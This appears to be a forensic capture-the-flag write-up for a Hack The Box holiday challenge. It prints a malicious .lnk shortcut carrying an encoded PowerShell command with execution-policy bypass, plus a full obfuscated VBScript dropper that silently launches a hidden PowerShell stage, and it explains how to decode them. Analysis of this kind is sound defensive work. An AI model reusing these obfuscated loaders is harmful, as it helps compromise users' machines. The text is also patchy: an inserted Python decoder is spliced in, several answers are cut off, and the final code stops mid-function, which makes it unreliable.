[Sherlocks Christmas Special] HTB OpTinselTrace-3 writeup

2024-02-29 23:30


TASK 1
What is the name of the file that is likely copied from the shared folder (including the file extension)?

I guessed this one, because I pulled all the SMB logs and found nothing relevant... If any of you know a way to find the shared folder, please leave a comment.

I saw that there is a zip under the user's Desktop path.
It is a

TASK 2
What is the file name used to trigger the attack (including the file extension)?

I was being dumb on this one; a friend had to remind me to dump and extract the zip.

Looking at the file contents, the first one is:

└─$ cat click_for_present.lnk 
P�O� �:i�+00�/C:\V1Windows@     ��.WindowsZ1System32B   ��.System32▒t1WindowsPowerShellT        ��.WindowsPowerShell N1v1.0:    ��.v1.0l2powershell.exeN    ��.powershell.exeTrick or treatB..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exep-ep bypass -enc JABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAtAFAAYQB0AGgAI
AAiAEMAOgBcAFUAcwBlAHIAcwBcACIAIAAtAEYAaQBsAHQAZQByACAAIgBwAHIAZQBzAGUAbg
B0ACoALgB2AGIAcwAiACAALQBGAGkAbABlACAALQBSAGUAYwB1AHIAcwBlAHwAIABTAGUAbAB
lAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBFAHgAcABhAG4AZABQAHIAbwBwAGUAcgB0AHkAIABG
AHUAbABsAE4AYQBtAGUAOwBjAHMAYwByAGkAcAB0ACAAJABmAGkAbABlAA==C:\Windows\Sy
stem32\shell32.dll�%SystemRoot%\System32\shell32.dll%SystemRoot%\System32
\shell32.dll�%��wN�▒�]N�D.��Q����      ��1SPS��XF�L8C���&�m�m.S-1-5-21-3849600975-1564034632-632203374-1001  
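To see what the shortcut actually runs without launching it, here is an added Python example (my own code, not part of the original writeup or of the challenge files): it pulls the base64 token that follows the -enc switch out of the shortcut's argument string shown above and decodes it as UTF-16LE, which is how powershell.exe's -EncodedCommand is encoded. The function names and the SHORTCUT_ARGUMENTS string are my assumptions; the base64 value is copied from the cat output.

```python
import base64

# Base64 blob copied from the click_for_present.lnk output above; the terminal
# wrapped it across several lines, so the pieces are joined back together here.
ENCODED_COMMAND = (
    "JABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAtAFAAYQB0AGgAI"
    "AAiAEMAOgBcAFUAcwBlAHIAcwBcACIAIAAtAEYAaQBsAHQAZQByACAAIgBwAHIAZQBzAGUAbg"
    "B0ACoALgB2AGIAcwAiACAALQBGAGkAbABlACAALQBSAGUAYwB1AHIAcwBlAHwAIABTAGUAbAB"
    "lAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBFAHgAcABhAG4AZABQAHIAbwBwAGUAcgB0AHkAIABG"
    "AHUAbABsAE4AYQBtAGUAOwBjAHMAYwByAGkAcAB0ACAAJABmAGkAbABlAA=="
)

# The shortcut's argument string as it appears in the cat output (reconstructed).
SHORTCUT_ARGUMENTS = "-ep bypass -enc " + ENCODED_COMMAND


def extract_encoded_command(arguments):
    """Return the base64 token that follows the -EncodedCommand switch, or None.

    powershell.exe accepts -e, -ec and any unambiguous prefix such as -enc or
    -encoded, so the switch is matched as a prefix of '-encodedcommand' instead
    of literally.  '-ep' (ExecutionPolicy) is not such a prefix and is skipped.
    """
    tokens = arguments.split()
    for i, tok in enumerate(tokens[:-1]):
        low = tok.lower()
        if low in ("-e", "-ec") or (low.startswith("-en") and "-encodedcommand".startswith(low)):
            return tokens[i + 1]
    return None


def decode_encoded_command(b64):
    """-EncodedCommand carries the script text as base64 over UTF-16LE bytes."""
    return base64.b64decode(b64).decode("utf-16-le")


def decode_shortcut(arguments):
    """Convenience wrapper: argument string in, plain PowerShell text out."""
    b64 = extract_encoded_command(arguments)
    return decode_encoded_command(b64) if b64 else None


if __name__ == "__main__":
    print(decode_shortcut(SHORTCUT_ARGUMENTS))
```

Running it prints the one-line PowerShell that the .lnk launches; the -Filter value in that line is the file TASK 3 asks about, and the same decoding applies to any -EncodedCommand seen in a shortcut, a scheduled task or a PowerShell event log entry.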

TASK 3
What is the name of the file executed by click_for_present.lnk (including the file extension)?

TASK 4
What is the name of the program used by the vbs script to execute the next stage?

Looking at the contents of the vbs, you will find it is only lightly obfuscated:

Nonphilosophicalgloriat = LenB("Ritualizing") 
Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
Private Const Overcrammi = &HFFFFB15F
Private Const Rdkridtet = &HFFFFB96E
Private Const Delarbejdets = -19974
Private Const Sammentraengte = "Atokal Becram Latchkeys"
Private Const Tlleapparaternes = "Tropikfronters Udludningen Uigenkaldeliges122 Gunsels"
Private Const Dispergeringsmidlers = "Homostyled Tiltuskede"
Private Const Indlejrende = -36431
Private Const Iteratively = "Rhyptical Stetoskopers"
Private Const Spadillers = "Decursive consubstantialism"
Private Const Gemenheden136 = "Afstumpningens Elusiveness Encirclements"
Private Const kromosomernes = "fells Fastballs Laron"
Private Const Insures = "Forsvarlige ydernes Approachens"
Private Const Medianens = -11670
Private Const Udviklingspsykologerne = &HDCEC
Private Const Afrustet = "Ceded Prajene Linkages"
Private Const Hyperalgebra228 = &HFFFFB5B0
Private Const Overrapturize = -45841
Private Const Sandormene = 21903
Private Const Ravenhood = "Outwrites Negligibly"
Private Const Zara = -40317
Private Const Landsforeningers = &HFFFF612F
Private Const Spulings = 53917
Private Const Forfjerdinger = &HFFFF1B6F
Private Const Matus = -64522
Private Const omskrendes = &HFFFF2EBE
Private Const Udpolstringerne70 = &HFFFF4034
Private Const Grandmother241 = -15586
Private Const Studeopdrtters = -10206
Private Const Elisas = "Redeployment Leglet"
Private Const Panicking = "Seriously Noisiest"
Private Const Rdhud = 64782
Private Const Rebelly = "Absenteringers Paleodendrologic Stvfrakkernes Suspenderendes"
Private Const Davon = -62249
Private Const Korsfst = &HCEA8
Private Const Busstoppestederne = 52451
Private Const Undladtes = &HFFFFBCBF
Private Const Idiologism = -21819
Private Const Kokoromiko = &HFFFF0BF2
Private Const Skalken = &H8570
Private Const Stribningens = -8436
Private Const Synthesization = "Graags157 Helligtrekongers Lillefingrene"
Private Const Lydbaands = 63620
Private Const Omphalodia = -38461
Private Const Butyrousness = "Witting Blokhaandteringens"
Private Const chirogymnast = "Smsyning blackballed"
Set colProcess = objWMIService.ExecQuery ("Select * from Win32_Process")
Modulidae = "WScript." & "Shell"
Set Firklverne = CreateObject(Modulidae)
For Each objProcess in colProcess
bb=instr(1,objProcess.Name,"s",vbTextCompare)
if bb <> 0 then exit for
Next
Unrustling = mid(objProcess.Name,bb,1)
Aadselsbilles = "power" & Unrustling & "hell "
Tetrafluoridepr196 = Log(883567)
A4 = A4 + "sproglGRINCHg){"
superassociatepa = Right("Myriacanthous157",38)
A4 = A4 + "RINCHcs thst de"
Fulyiehasteindkaldel = MidB("Recirkulerede", 198, 100)
A4 = A4 + "dwelleGRINCH GR"
Momusesfarvefabr = Momusesfarvefabr & "Organbird" 
A4 = A4 + "spesed thn joyo"
Fyringsgasoliensyttendede = FormatDateTime("12/12/12")
A4 = A4 + "ut celebLatGRIN"
Voguishnesspencillersga = MidB("Nonsacredly", 5, 201)
A4 = A4 + "RINCHn$er holed"
while (Vrdihfteslarsonaandsviden<88)
Vrdihfteslarsonaandsviden = Vrdihfteslarsonaandsviden + 1
Fornyelsesbevgelseh = Fornyelsesbevgelseh * (1+1)
wendUnderkendelseskla = Rnd
A4 = A4 + "bsGRINCHmmGRINC"
Clodknockerfejlretableri = Now
A4 = A4 + "t GRINCHng up$d"
Sparkletmendiecri = Sparkletmendiecri & "Upjerk" & "Sakieh" 
A4 = A4 + ", lnd sGRINCHnu"
Lazarouswonderst = Split("Sanativeness")
A4 = A4 + "ked wGRINCHs lG"
Livsenergienssabbat = Right("Chics",67)
A4 = A4 + "esteve tranGRIN"
Hitchiestlailahsmiljmini = FormatPercent(4686710)
A4 = A4 + "CHtGRINCHonstal"
Fiberrigejordblonderme = "Janie" & "Lovering187" & "Bldersygdommene" 
A4 = A4 + "INCHon dGRINCHo"
Panelersbatturegensk = FormatNumber(812904)
A4 = A4 + "NCHag the towns"
Flyvekkkenernescocamamab = "Nilghais"
Flyvekkkenernescocamamab = Replace(Flyvekkkenernescocamamab,"Humdrumminess","Galilernes")
A4 = A4 + "RINCHpGRINCHt t"
Prosadigtetsundia = Prosadigtetsundia * 3889211 
A4 = A4 + ""
Renkulturenkopip = Split("Feeblebrained")
A4 = A4 + ""
Aflejretgnomologicaludm = Aflejretgnomologicaludm & "outcome" 
A4 = Replace(A4,"GRINCH","i")
Rostellariaholdarb = LCAse("Tevandskngts")
Firklverne.Run Aadselsbilles + Chr(34) + A4 + Chr(34),0

What finally runs is Aadselsbilles + Chr(34) + A4 + Chr(34),0
so we need to look at Aadselsbilles.

Set colProcess = objWMIService.ExecQuery ("Select * from Win32_Process")
Modulidae = "WScript." & "Shell"
Set Firklverne = CreateObject(Modulidae)
For Each objProcess in colProcess
bb=instr(1,objProcess.Name,"s",vbTextCompare)
if bb <> 0 then exit for
Next
Unrustling = mid(objProcess.Name,bb,1)
Aadselsbilles = "power" & Unrustling & "hell "

colProcess fetches all current processes, that is, the instances of the Win32_Process class.

For Each objProcess in colProcess
bb=instr(1,objProcess.Name,"s",vbTextCompare)
if bb <> 0 then exit for

Each item of colProcess is assigned to objProcess in turn, and the variable bb gets the position of the character 's' in the current process name (objProcess.Name).

Unrustling = mid(objProcess.Name,bb,1)
Aadselsbilles = "power" & Unrustling & "hell "

Mid counts from index 1 and takes the single character at position bb of objProcess.Name, which is an 's'.
So

Aadselsbilles="power" & 's' & "hell "

TASK 5
What is the name of the function used for the powershell script obfuscation?

You can see the A4 part that PowerShell finally executes; A4 is obfuscated too, so filter those lines out and print them:

└─$ grep 'A4' present.vbs 
A4 = A4 + "FunctGRINCHon W"'Hypogee Stvknaps Polarimeters Tritanopic Brunroden
A4 = A4 + "rapPresent ($En"'Mirepoix250 Resoluttes Ansvarligere
A4 = A4 + "sproglGRINCHg){"
A4 = A4 + "$NrGRINCHngsvGR"'Servietters Tvelys Pillernes
A4 = A4 + "INCHrksomhedern"'Skraastribedes Raadighedsbelbet Nitrere Gruppere
A4 = A4 + "es = $EnsproglG"'Nedjustere Rgerrigheder Yellowfish145
A4 = A4 + "RINCHg.Length-1"'Lyssignalet Collegers
A4 = A4 + "; For ($SmGRINC"'Tillidsfuld Zap188
A4 = A4 + "Hths211=6; $SmG"'Tyvagtigt Sanitetsmestre Riverbush Tresche
A4 = A4 + "RINCHths211 -lt"'Krestens Relateret
A4 = A4 + " $NrGRINCHngsvG"'Svampekostenes Afleverede121 Martyrminernes ungkreaturer
A4 = A4 + "RINCHrksomheder"'Supercargoship Festprogrammerne Ratakslens
A4 = A4 + "nes){$MalGRINCH"'Bootjack211 Unsinuate Giacobo Lasters Melancholious
A4 = A4 + "ce=$MalGRINCHce"'unrelentor Ducklar Kalendarium Beundrerindernes
A4 = A4 + "+$EnsproglGRINC"'Postprojekt86 Bygningselementers Blackening Abildhj
A4 = A4 + "Hg.SubstrGRINCH"'Spillway Antarktis Libyske
A4 = A4 + "ng($SmGRINCHths"'Bugtalernes Demissioneret Uflsomme
A4 = A4 + "211, 1);$SmGRIN"'Trimesinic Flyvepladsen
A4 = A4 + "CHths211+=7;}$M"'Diazotize Riffelgang
A4 = A4 + "alGRINCHce;};$p"'Moderselskabernes Yngledygtigere Floorings Plastvarens
A4 = A4 + "resent=WrapPres"'Phthisiology Acetphenetidin Senatorernes ethyl
A4 = A4 + "ent 'Once uhon "'Wilda Diversifiable Attracts teknologs Privatissime
A4 = A4 + "a ttme, GRINCHn"'Blgelinie Museflderne Borgersind171 Udbytningens
A4 = A4 + "tthe whpmsGRINC"'Beauty Hklenaalens Frsningen
A4 = A4 + "Hcal:town o/ Ho"'Sowbug Indvaaneres Anemopsis Musikprogram Vestkysterne
A4 = A4 + "lGRINCHd/y Holl"'Navellike Ileocolic Kultivatoren Redemptive Radiatory
A4 = A4 + "7w, the7e lGRIN"'Firemaster Anfordringskontos Isomorphisms
A4 = A4 + "CHve. two l7gen"'Septiferous Myrs27 Padle Sheaflike
A4 = A4 + "dar4 fGRINCHgur"'Frousy Seksdageslbenes
A4 = A4 + ".s know1 far a9"'Cykelryttere Frankeringens207 Convulsed
A4 = A4 + "d wGRINCHde8 th"'Pedanteriets Underfundighederne
A4 = A4 + "e G.GRINCHnch a"'Bargeman Deflected141
A4 = A4 + "5d Sant2 Claus/"'Terminalknudens16 companator Nattekvarter
A4 = A4 + " They desGRINCH"'Malacopodous Unincantoned
A4 = A4 + "dedeon oppssGRI"'Satisfaktionernes Diagnostisk
A4 = A4 + "NCHte stdes ofr"'Udstykkernes Brndvidderne Aflsningens
A4 = A4 + "the toon, eacy "'Excommunicant Bargaining
A4 = A4 + "wGRINCHth _heGR"'Corinnes Interparlamentarisk Tubaerne Frekvenskomponenternes Rokketands
A4 = A4 + "INCHr ocn unGRI"'Retraversing Philosophicopsychological
A4 = A4 + "NCHqhe charrcte"'Datacenter ruineredes Trapez Rag90
A4 = A4 + "rGRINCHsGRINCHG"'Geometrid177 Bindle
A4 = A4 + "RINCHcs thst de"
A4 = A4 + "fGRINCHted them"'Crinkles traktorens Tvisters Stedtillgget
A4 = A4 + ". The arGRINCHn"'Srinteresseomraadernes Ormegaardenes
A4 = A4 + "ch,sa solGRINCH"'Tiltningens Tyromancy Tandbrstnings
A4 = A4 + "/ary creature,v"'dataerklringerne Langel Rickettsiales Oprullede Strandgrunden
A4 = A4 + "dwelleGRINCH GR"
A4 = A4 + "INCHn a lave at"'Skelter Combusting
A4 = A4 + "_p Mounp Crumpr"'Virussernes Bahrains Uninvestigated
A4 = A4 + "t. WGRINCHte hG"'anoli Pantellerite Associableness
A4 = A4 + "RINCHs gseen fu"'Alloker Bevogtnings Panserglasrude Synnves
A4 = A4 + "e and anheart t"'Ophjningen bortfjernelser Unlighted
A4 = A4 + "eemGRINCHng.y t"'Ruledom Exship Favoriserende
A4 = A4 + "wo jGRINCHzes t"'Kalk Efterlnner Udbldning88
A4 = A4 + "po smalg, he h'"'Bepuddle Overfiske Vekselstrmmenes
A4 = A4 + ";$gluhweGRINCHn"'Reagensglasbarns Printerjob Proctored
A4 = A4 + "=WrapPresent 'd"'Blomsterrige Zamboer Tomahawks136
A4 = A4 + " a peGRINCHchan"'Modstandsgruppes Anglomaner Cyanogenamide Sluddet118
A4 = A4 + "t eor mGRINCHsx"'Dengang Forhandlingsklimas Anagrammatisation Furling Anisodont
A4 = A4 + "hGRINCHef a';. "'Fireaarsdrengen Peins Svejseflammerne Ambitendency haardnakkedes
A4 = A4 + "($gluhweGRINCHn"'Acinetinan Niais
A4 = A4 + ") (WrapPresent "'Statsskattedirektoraternes Udlevede162 Blegnings Polydispersity
A4 = A4 + "'d a dGRINCH$da"'Sulphocarbolic bert Costumiers
A4 = A4 + "GRINCHn fpr any"'Galvanised Stningsbloks Cabirian49 Grnsestationen
A4 = A4 + "teGRINCHng fert"'traject Several116 Traumatiser
A4 = A4 + "GRINCHve. se de"'Slaggers236 Arbejdsstykker Dillseed Ranva226
A4 = A4 + "spesed thn joyo"
A4 = A4 + "ut celebLatGRIN"
A4 = A4 + "CHonsothat echo"'lavmaalet Nabonulpunkters Sapromic kvdernes
A4 = A4 + "ed tarough the "'Buffistens Paychecks stablemen Indremissionsk cryptolunatic
A4 = A4 + "towGRINCH, espe"'Affaldsskakten Aquiparous Brnesikrings
A4 = A4 + "oGRINCHally nur"'Trinlse Spejdende Sangkoret Styrkegrad unsensualise
A4 = A4 + "GRINCHng =he wG"'Regimer Udspar Balkan137
A4 = A4 + "RINCHn$er holed"
A4 = A4 + "ays. nn the vth"'Deerberry Sregn Chebacco Gunfighter
A4 = A4 + "er s:de of tolG"'Blackamoors Unsugared Menstruation41 Cytochylema Opkrvningsgebyret
A4 = A4 + "RINCHdayeHollow"'Immatrikulecr Parafraseret Fratrdelses Othilies Tandteknikers
A4 = A4 + "m nestlpd GRINC"'Foldstool Spongeless Importere144
A4 = A4 + "Hn ac');$FGRINC"'Astronautic oxyderingen Chappies89 energiudladningerne ivars
A4 = A4 + "Hle=WrapPresent"'Speaketeksternes Stenansigternes Totty Superintendential
A4 = A4 + " 'cozy w\rkshop"'Continuingly Vaebnerrang Oarless Kashmirens
A4 = A4 + "pat therNorth e"'Husmandskone Hardwares Kommunalbestyrelser
A4 = A4 + "ole, lsved the "'Sagoens Overarbejderne Alexius75
A4 = A4 + "jollynand betev"'subcutaneous Rekonvalesceret Makroredigeringerne
A4 = A4 + "olen. SantaeCla"'Borggaardene Doggerelism Folkemusiks
A4 = A4 + "us.xWGRINCHth h"'Josephus Anbefalendes Textuality Cosmus Monogynious
A4 = A4 + "es roun';. ($gl"
A4 = A4 + "uhweGRINCHn) (W"'Galileis Jernstberierne Slappelsers pst
A4 = A4 + "rapPresent ' be"'Inanely Dgnkiosk Cementmaker Borden
A4 = A4 + "lly$ rosy pheek"'Jointwood Artificial Hornlike Unidealistically160
A4 = A4 + "s,eand a reart "'Prorektor Oxshoe Outshowed Dataselskabets
A4 = A4 + "bsGRINCHmmGRINC"
A4 = A4 + "HngewGRINCHth k"'Maksimmrr Prodition Nonchronical Paatrngende Antagonisers
A4 = A4 + "nndnesst he spL"'Angakokker136 Rehandles Barramunda
A4 = A4 + "nt hGRINCHsoday"'Admissive Fortifys
A4 = A4 + "s ccaftGRINCHng"'Narcos Lambitive
A4 = A4 + "atoys ftr chGRI"'Handlike Hypnotiserendes
A4 = A4 + "NCHlGRINCHren a"'Krydsmissilet30 Wolfen Clappered Ditetik
A4 = A4 + "round thn world"'Quadrilogy Ansa Deflationens
A4 = A4 + "=and sp$eadGRIN"'Amortization Snoringly
A4 = A4 + "CHngpcheer eher"'Radiologiens Palestra Kondicykels Velegnet skryderens
A4 = A4 + "ever he west. Y"'Cammed Maitressens Brancheanalysen Giolitti
A4 = A4 + "eae afternyear,"'Mensurations57 Elitre103 Ocarina Colymbriformes37 bestver
A4 = A4 + " ts the LolGRIN"'Lemur Rvrendt Folklorister vigepligtige Repacked
A4 = A4 + "CHdayoseasoncap"'Underbelyst Blotchier Swinery
A4 = A4 + "proaahed, tte t"'Perturbedness Snydeblusens Reagenset Trillingefdsel
A4 = A4 + "ownGRINCHfolk e"'Bicepserne Spejderhaglene staalvrksarbejders Heterodoxness
A4 = A4 + "ogerly nrepare+"'snnikens Halvaarlige Loupcerviers
A4 = A4 + " for f$stGRINCH"'Gennemprygling Unisonance
A4 = A4 + "vGRINCHtFes, ad"'Gjalt Autentificeringerne
A4 = A4 + "GRINCHrnGRINCHn"'Orthodoxal Sprightfulness Fagforeningskomiteer220 Teleophyte Oversecured
A4 = A4 + "g lhe streets w"'Devouringly Towelette121 borogove Lavvandstand Londonsk
A4 = A4 + "GRINCHh');. ($g"'Callower Overphilosophize eksport
A4 = A4 + "luhweGRINCHn) ("'Cangle Tripot
A4 = A4 + "WrapPresent 'h "'pulsaarers Rulleskjters
A4 = A4 + "lGRINCHgh.s, se"'Subvariety Sopite67 Nonrecessive
A4 = A4 + "t GRINCHng up$d"
A4 = A4 + "ecoragGRINCHons"'Usundt protectively Trepanation Opfordrings14 Naiades63
A4 = A4 + ", lnd sGRINCHnu"
A4 = A4 + "GRINCHng johful"'Nattetiderne165 Hyttefadenes pupfish Vesicle Vulkaniserendes
A4 = A4 + " tuwes. Whele S"'Makulere oksekdet uvenskabeligt
A4 = A4 + "anGRINCHa busGR"'Vrn Forskelsbehandling Indlaansordningers Overtalelseskunsten
A4 = A4 + "INCHny prep red"'Metabular Propagandists Brnetestamenters Fortovsparkeringernes Revelsbens
A4 = A4 + " hGRINCH( sleGR"'Tjekkene Varmekilden
A4 = A4 + "INCHgN and ceec"'eksplodere Knlendes Elsket
A4 = A4 + "ked wGRINCHs lG"
A4 = A4 + "RINCHs- twGRINC"'Katacrotism Macrodactylous unsustained Haderslev
A4 = A4 + "HceO the GbGRIN"'Parables Strobing Televrks
A4 = A4 + "CHnch sjethed e"'Talekanalerne Pegepinden Historiebogen Majuscules shellmonger
A4 = A4 + "n hGRINCHs cave"'Deklamationsnummerets Pyroglazer Generere Resurrectioner
A4 = A4 + ", GRINCHtrGRINC"'Sulphinate Sjllst
A4 = A4 + "Htate  by thn m"'Vollenge Forebitter Mallorcineren Tiptipoldemdre Misidentified
A4 = A4 + "errGRINCHeent t"'Sakkede Stemmeseddelen Softwareudviklings Spritfabrikantens Skyggeboksningernes
A4 = A4 + "htt fGRINCHll.d"'Woollies Brnefri Pbs
A4 = A4 + " the wGRINCHr. "'Organs Sociolingvistikken Urtekosten Shanker Besrgendes
A4 = A4 + "One fatefbl wGR"'Remoote Labilizations Cumhal Underzealously154
A4 = A4 + "INCHntcr, a plr"'Fejemget materialistisk Dogmatists Bents Heraldiker
A4 = A4 + "tGRINCHculGRINC"'Overspunden Heteroclitica Pamperos Becowards77 Fjases
A4 = A4 + "Hrly GRINCHce c"'Geomorphogeny Embrawn Barber
A4 = A4 + "hGRINCHllnswept"'Sankedes Tkkehalm
A4 = A4 + " through)HolGRI"'twafauld Smelterman Hypotekbanks
A4 = A4 + "NCHda. HolloD, "'Ajstrups takkebnner
A4 = A4 + "causong chaws a"'Lam Afmystificeredes Brnefngsel Kaias
A4 = A4 + "nd nGRINCHsrupt"'Zitherist Tyndstegsfilet Prominently Overnicely Quibus
A4 = A4 + "lng theoholGRIN"'Aabent Flaughts Turbiner Sammentllings21
A4 = A4 + "CHdaa spGRINCHr"'sporstofferne Intervaled Dilly Sinneds
A4 = A4 + "GRINCHd. The Fn"'Gambone Underset Terebridae
A4 = A4 + "owstoGRINCHms g"'Kammesjukkens Bavaria Skider Underkursen Ndendes
A4 = A4 + "rel wGRINCHldee"'Talismanens Mondego Embrave
A4 = A4 + ", and (he tow$s"'Nonstability Skrivesituation
A4 = A4 + "folk ptrugglrd "'Trunnion16 Hyperhedonia salgsudviklings Starutternes
A4 = A4 + "to keep thesr f"'Sygeplejeassistenterne Untraceableness Elodeaceae Costar129 Survivalists249
A4 = A4 + "esteve tranGRIN"
A4 = A4 + "CHtGRINCHonstal"
A4 = A4 + "GRINCHve.,ChGRI"'Windscreen Domineredes Lays Anguineous
A4 = A4 + "NCHldr$n werepd"'Troldende Lisente
A4 = A4 + "GRINCHsappeGRIN"'Kloning Ibidem Subdelegating
A4 = A4 + "CHnted rs the s"'Hydrometeorologist Geometriers
A4 = A4 + "rospece of a no"'Theocrasy Arsenicalism Enkeltradet
A4 = A4 + "yous telebraLGR"'Lues Sinonism Strmhvirvlens
A4 = A4 + "INCHon dGRINCHo"
A4 = A4 + "med. WctnessGRI"'Slknings Lakfarver
A4 = A4 + "NCHag the towns"
A4 = A4 + " dGRINCHstresso"'Coelibat Sprogfrdighedens
A4 = A4 + " Santanknew h) "'Urgeringers Druery Composersatsers30 Verdensmagts Overstaffing
A4 = A4 + "had t; do soe')"'Unweighting Raastofferne
A4 = A4 + ";. ($gluhweGRIN"'Poletters Ddc Skumplaster
A4 = A4 + "CHn) (WrapPrese"'Diopsidae afmagringskures Ttnede55 Javaneres
A4 = A4 + "nt 'ethGRINCHng"'Lokkers Revoltingly Erfaringsvidenskab
A4 = A4 + "Sto restore tha"'Columbier Strithaarets Alexandrianism
A4 = A4 + " holGRINCHdry c"'Vulkanernes Oprrsgruppen Subedited Cutty
A4 = A4 + "heet. WGRINCHth"'Unemendable Destillerapparaters Forelskelses
A4 = A4 + "-a twGRINCHnPle"'Gteskabslignende Dagsordener
A4 = A4 + " GRINCHn rGRINC"'Meteorologies Grafologer Conversional
A4 = A4 + "Hs eyeoand a ce"'Antropologi Krusningens Sliknes34
A4 = A4 + "art fell of sop"'Unhawked Ufattelighed Stubrunner
A4 = A4 + "e, hs decGRINCH"'Foldboat Ishockey Lalle remark Dockise
A4 = A4 + "d d to p$y a vG"'Omsorgscentrenes Unchaffing Redenigrate sortmejses Profounder83
A4 = A4 + "RINCHpGRINCHt t"
A4 = A4 + "o ehe GrGRINCHr"'Thorups Passagerskibets Skitsering Scalt Genetor
A4 = A4 + "ch, hosGRINCHng"'Dactylopore Cologners Unilaterales
A4 = A4 + " toewarm hns he"'Republicanises Perthosite Springbalsaminers
A4 = A4 + "art and bLGRINC"'Azrael Traadningslister
A4 = A4 + "Hng baok the cp"'lstykke Treblet
A4 = A4 + "GRINCHrGRINCHt "'Ostentatious Tunfiskene Otter
A4 = A4 + "af the teason.G"'Organisationslinies Kiasmernes
A4 = A4 + "RINCHGuGRINCHde"'ratio Succinctoria Praedikatomdoebning
A4 = A4 + "doby hGRINCHsnu"'Skansekldningernes Dramme Kommunikationsbehovs
A4 = A4 + "nyGRINCHel;GRIN"'Udvandringens Homopati Specifiability Syslen Hydrophytism
A4 = A4 + "CH');"'Liberaliseringerne Dth Stolpesengens Uforstilt Pollux
A4 = A4 + ""'Sikkerhedsstillelsernes Indfrings Kilders Trolddomsevne
A4 = A4 + ""
A4 = A4 + ""'Arbejderungens Mbelfabrikkerne
A4 = A4 + ""'Tepehuane239 Enmeshes
A4 = A4 + ""
A4 = Replace(A4,"GRINCH","i")

Printing it directly from the vbs also works;
I chose to replace ' with # first and then print it, and then the function can be seen:

Function ****** ($Ensproglig){$Nringsvirksomhedernes = 
$Ensproglig.Length-1; For ($Smiths211=6; $Smiths211 -lt 
$Nringsvirksomhedernes){$Malice=$Malice+$Ensproglig.Substring($Smiths211, 
1);$Smiths211+=7;}$Malice;};$present=WrapPresent #Once uhon a ttme, 
intthe whpmsical:town o/ Holid/y Holl7w, the7e live. two l7gendar4 
figur.s know1 far a9d wide8 the G.inch a5d Sant2 Claus/ They desidedeon 
oppssite stdes ofrthe toon, eacy with _heir ocn uniqhe charrcterisiics 
thst defited them. The arinch,sa soli/ary creature,vdwellei in a lave 
at_p Mounp Crumprt. Wite his gseen fue and anheart teeming.y two jizes 
tpo smalg, he h#;$gluhwein=WrapPresent #d a peichant eor misxhief a#;. 
($gluhwein) (WrapPresent #d a di$dain fpr anyteing fertive. se despesed 
thn joyout celebLationsothat echoed tarough the towi, espeoially nuring 
=he win$er holedkshoppat therNorth eole, lsved the jollynand betevolen. 
SantaeClaus.xWith hes roun#;. ($gluhwein) (WrapPresent # belly$ rosy 
pheeks,eand a reart bsimmingewith knndnesst he spLnt hisodays 
ccaftingatoys ftr chiliren around thn world=and sp$eadingpcheer eherever 
he west. Yeae afternyear, ts the Lolidayoseasoncapproaahed, tte townifolkeogerly nrepare+ for f$stivitFes, adirning lhe streets wih#);. ($gluhwein) (WrapPresent #h ligh.s, set ing up$decoragions, lnd sinuingjohful tuwes. Whele Sania businy prep red hi( sleigN and ceecked wis lis- twiceO the Gbinch sjethed en his cave, itritate  by thn merrieentthtt fill.d the wir. One fatefbl wintcr, a plrticulirly ice chillnswept through)Holida. HolloD, causong chaws and nisruptlng theoholidaa spirid. The Fnowstoims grel wildee, and (he tow$sfolk ptrugglrd to keep thesr festeve tranitionstalive.,Childr$n werepdisappeinted rs the srospece of a noyous telebraLion diomed. Wctnessiag the towns distresso Santanknew h) had t; do soe#);. ($gluhwein) (WrapPresent #ethingSto restore tha holidry cheet. With-a twinPle in ris eyeoand a ceart fell of sope, hs decid d to p$y a vipit to ehe Grirch, hosing toewarm hns heart and bLing baok the cpirit af the teason.iGuidedoby hisnunyiel;i#);
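Both the reassembly of A4 and the decoder function in the recovered PowerShell can be reproduced without running anything from the sample. The following Python is an added example of mine, not code from the writeup or from the malware: reassemble_a4 joins the A4 fragments in source order, strips the junk comments and applies the final Replace, and wrap_present is a port of the decoder the recovered script calls WrapPresent (start at index 6, take every 7th character while the index stays below Length-1). VBS_SAMPLE is a handful of lines copied from the grep output above, FIRST_LITERAL is the first string passed to the decoder as printed above, and all function names are my assumptions.

```python
import re

# A few of the "A4 = A4 + ..." lines from the grep output above (copied from the
# page; the real script has close to 200 of them).  The trailing 'comment on
# each line is junk the obfuscator appends.
VBS_SAMPLE = """\
A4 = A4 + "FunctGRINCHon W"'Hypogee Stvknaps Polarimeters Tritanopic Brunroden
A4 = A4 + "rapPresent ($En"'Mirepoix250 Resoluttes Ansvarligere
A4 = A4 + "sproglGRINCHg){"
A4 = A4 + "$NrGRINCHngsvGR"'Servietters Tvelys Pillernes
A4 = A4 + "INCHrksomhedern"'Skraastribedes Raadighedsbelbet Nitrere Gruppere
A4 = A4 + "es = $EnsproglG"'Nedjustere Rgerrigheder Yellowfish145
A4 = A4 + "RINCHg.Length-1"'Lyssignalet Collegers
A4 = Replace(A4,"GRINCH","i")
"""

# The first string literal handed to the decoder, copied from the printed output
# above (where the author displayed ' as #).
FIRST_LITERAL = (
    "Once uhon a ttme, intthe whpmsical:town o/ Holid/y Holl7w, the7e live. "
    "two l7gendar4 figur.s know1 far a9d wide8 the G.inch a5d Sant2 Claus/ "
    "They desidedeon oppssite stdes ofrthe toon, eacy with _heir ocn uniqhe "
    "charrcterisiics thst defited them. The arinch,sa soli/ary creature,"
    "vdwellei in a lave at_p Mounp Crumprt. Wite his gseen fue and anheart "
    "teeming.y two jizes tpo smalg, he h"
)

# Matches one fragment line; the capture stops at the closing quote, so the
# junk comment after it is dropped.
_FRAG_RE = re.compile(r'^A4 = A4 \+ "((?:[^"]|"")*)"')


def reassemble_a4(vbs_text, marker="GRINCH", replacement="i"):
    """Join every A4 fragment in order and apply the final Replace(A4,"GRINCH","i")."""
    pieces = []
    for line in vbs_text.splitlines():
        m = _FRAG_RE.match(line.strip())
        if m:
            # VBScript writes a literal double quote inside a string as ""
            pieces.append(m.group(1).replace('""', '"'))
    return "".join(pieces).replace(marker, replacement)


def wrap_present(s, start=6, step=7):
    """Port of the decoder in the recovered PowerShell: character at index 6,
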